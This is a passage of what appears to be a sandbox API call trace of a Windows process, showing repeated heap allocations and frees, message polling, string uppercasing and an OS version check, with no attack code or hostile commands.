PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.324] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.324] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0260.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0260.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.325] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0260.326] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0260.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0260.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0260.327] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.327] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.328] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.328] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0260.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.330] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0260.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.331] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.332] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0260.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0260.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.334] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.335] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.335] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0260.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.336] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0260.337] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0260.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.337] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0260.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.340] HeapFree (in: 